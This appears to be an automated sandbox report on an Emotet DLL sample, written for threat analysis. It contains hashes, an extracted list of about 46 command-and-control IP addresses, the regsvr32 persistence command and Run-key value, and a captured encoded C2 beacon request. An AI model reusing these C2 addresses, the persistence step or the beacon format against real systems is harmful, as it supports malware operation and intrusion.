Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
04/11/2022, 18:49 UTC
Static task
static1
Behavioral task
behavioral1
Sample
907f0aef33e327e3a6ef953548beb950622473e82dae060a4fe5b76a55a43e5f.dll
Resource
win10-20220812-en
General
-
Target
907f0aef33e327e3a6ef953548beb950622473e82dae060a4fe5b76a55a43e5f.dll
-
Size
887KB
-
MD5
d9a07944f3ea275a3eda4d345d110a56
-
SHA1
3b847bb8106fbdefad65449810b2b897bda7b163
-
SHA256
907f0aef33e327e3a6ef953548beb950622473e82dae060a4fe5b76a55a43e5f
-
SHA512
a4f24dc3c8847800be2ba1971287ee2df8b813a3ce9ee5c2703b2ec78335904ef6da7b57c9a58aa99ce0831bcefc4c740105a242ecc6950dd6b6c6fcc4b9df8e
-
SSDEEP
12288:A0BQgtzAxM8q6BkmkxisTsxwJzCQ6TZ56lu4Vp4y1F9SFXCwQ7bk:Ar6zAxVq6Bkm7saIzCXTZxUJFcK
Malware Config
Extracted
emotet
Epoch5
178.238.225.252:8080
139.196.72.155:8080
36.67.23.59:443
103.56.149.105:8080
37.44.244.177:8080
85.25.120.45:8080
202.134.4.210:7080
78.47.204.80:443
83.229.80.93:8080
93.104.209.107:8080
80.211.107.116:8080
165.22.254.236:8080
104.244.79.94:443
185.148.169.10:8080
190.145.8.4:443
175.126.176.79:8080
139.59.80.108:8080
188.165.79.151:443
128.199.217.206:443
64.227.55.231:8080
218.38.121.17:443
103.71.99.57:8080
103.224.241.74:8080
128.199.242.164:8080
85.214.67.203:8080
103.254.12.236:7080
46.101.98.60:8080
178.62.112.199:8080
210.57.209.142:8080
195.77.239.39:8080
103.126.216.86:443
82.98.180.154:7080
202.28.34.99:8080
174.138.33.49:7080
160.16.143.191:8080
51.75.33.122:443
103.41.204.169:8080
186.250.48.5:443
87.106.97.83:7080
118.98.72.86:443
196.44.98.190:8080
103.85.95.4:8080
62.171.178.147:8080
54.37.228.122:443
114.79.130.68:443
198.199.70.22:8080
Signatures
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YjZGmkrHITl.dll = "C:\\Windows\\system32\\regsvr32.exe \"C:\\Windows\\system32\\YRTRgdIIt\\YjZGmkrHITl.dll\"" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2016 regsvr32.exe 2016 regsvr32.exe 2240 regsvr32.exe 2240 regsvr32.exe 2240 regsvr32.exe 2240 regsvr32.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2016 regsvr32.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2016 wrote to memory of 2240 2016 regsvr32.exe 66 PID 2016 wrote to memory of 2240 2016 regsvr32.exe 66
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\907f0aef33e327e3a6ef953548beb950622473e82dae060a4fe5b76a55a43e5f.dll1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\regsvr32.exeC:\Windows\system32\regsvr32.exe "C:\Windows\system32\YRTRgdIIt\YjZGmkrHITl.dll"2⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:2240
-
Network
-
Remote address:218.38.121.17:443RequestGET / HTTP/1.1
Connection: Keep-Alive
Cookie: KNDTJCjmA=O9S8oOlZdaL7Vi+3V9CJkZ7i/3JWxfxQAMJN+G1LPmM1FOHdxhjTJ6Lr3Z2VAI7mC6cW+cHlkHR/IK3+MiJmFvRZDytuCgA0RPx5bEqelsLxzC60MU2fx68LvyxE4iA+RRDVyrq/pmo7V2U7WmFEStZUbMZbiWT6AmszrYcIVVVMd1D20FAeVHOSr7XAVLjcM+tX/7kpytP/ALG2UKqPEWguliHrahtC/yCBRGAN6h9l93EQpyjVeYONbNNUUmBV/n7pepduL8ZEqtWyBCy1i+oKI9KEHiFpaF6FktKCBOY+tPSbtcphUU2s8XfEHvHF8LXeeuG/w7PIQCbZCSOTbqnK
Host: 218.38.121.17
ResponseHTTP/1.1 200 OK
Date: Fri, 04 Nov 2022 18:50:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
322 B 7
-
1.2kB 2.6kB 11 11
HTTP Request
GET https://218.38.121.17/HTTP Response
200 -
322 B 7